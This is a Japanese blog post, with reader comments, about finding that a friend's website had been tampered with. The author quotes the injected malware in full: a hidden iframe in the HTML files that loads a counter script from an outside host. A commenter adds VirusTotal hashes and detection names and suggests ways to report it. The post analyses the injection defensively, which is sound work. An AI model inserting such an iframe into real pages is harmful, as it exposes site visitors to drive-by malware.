2013年5月3日金曜日

やっかいなマルウェア

MaAfee、トレンドマイクロ、ノートンなどの有名ウィルスソフトでも認識されないマルウェアがあるようです。

インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。

ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。

知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。


この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???

いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。

これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???

検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。

数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。

http://sitecheck.sucuri.net/scanner/

ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。

</html><iframe src="http://autopd.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/

どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると

ロシアのURLらしき記述が多数見つかりました。

Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。



投稿者 時刻:

3 件のコメント:

  1. 2013年5月3日 14:28

    改行入れてください
    一瞬ここがやられたのかと思っちゃいますたw

    行末に「>」を入れて「html_autopd.txt」でVirusTotalに投げてみました
    https://www.virustotal.com/en/file/97bb8a02ca2f23c678d7253cdf38e71cf86874ced50b234d839f9dac25ce6093/analysis/1367558533/
    SHA256: 97bb8a02ca2f23c678d7253cdf38e71cf86874ced50b234d839f9dac25ce6093
    SHA1: 4ade39b5a4724ccc657a9abae5d1d67340c2d7e6
    MD5: a68b47ce809e8c075c619fdf7617e216
    File size: 142 bytes ( 142 bytes )
    File name: html_autopd.txt
    File type: Text
    Detection ratio: 13 / 46
    Analysis date: 2013-05-03 05:22:13 UTC
    Antivirus Result Update
    AntiVir HTML/Infected.WebPage.Gen3 20130503
    Avast HTML:Iframe-ZG [Trj] 20130503
    BitDefender Trojan.Iframe.BMY 20130503
    Comodo TrojWare.JS.Iframe.GJ 20130503
    DrWeb JS.IFrame.425 20130503
    Emsisoft Trojan.Iframe.BMY (B) 20130503
    F-Secure Trojan.Iframe.BMY 20130503
    Fortinet JS/Iframe.BMY!tr 20130503
    GData Trojan.Iframe.BMY 20130503
    Kaspersky HEUR:Trojan.Script.Generic 20130503
    MicroWorld-eScan Trojan.Iframe.BMY 20130503
    Norman Iframe.gen 20130502
    nProtect Trojan.Iframe.BMY 20130503

    行頭のHTML終了タグを抜いた「iframe_autopd.txt」
    SHA256: e215033508c6ebeb5eb3b12cf84b7d125f689b2f5d28f0cae5eb0ca07632da09
    SHA1: 87eda14137511a01eecde747a071a9e23c303f2c
    MD5: 883daef0d66f7b94163c43ccc62c84a5
    File size: 135 bytes ( 135 bytes )
    File name: iframe_autopd.txt
    File type: Text
    Detection ratio: 9 / 46
    Analysis date: 2013-05-03 05:24:08 UTC
    Antivirus Result Update
    BitDefender Trojan.Iframe.BMY 20130503
    Comodo TrojWare.JS.Iframe.GJ 20130503
    DrWeb JS.IFrame.425 20130503
    Emsisoft Trojan.Iframe.BMY (B) 20130503
    F-Secure Trojan.Iframe.BMY 20130503
    Fortinet JS/Iframe.BMY!tr 20130503
    GData Trojan.Iframe.BMY 20130503
    Norman Iframe.gen 20130502
    nProtect Trojan.Iframe.BMY 20130503

    解析お疲れ様でした。

    返信削除
    返信
    1. nobukaji2013年5月10日 7:35

      解析ありがとうございます。

      VirusTotal知りませんでした。今後活用します。

      解析を見る限りトロイ系改ざんだと思うのですが、50日たってもGoogleウェブマスタツールはマルウェアなしで検知しません。

      削除
    2. 2013年5月12日 1:02

      こゆのに突っ込む
      http://www.google.com/safebrowsing/report_badware/

      でもぐぐるの警告受けるの待つより、IPAとかに報告して対応を促したほーがいーよーな。
      Dr.WEBが反応してるっぽいので、リンクチェッカー通して知らせるのもありかと
      http://free.drweb.co.jp/linkchecker/

      削除

登録: コメントの投稿 (Atom)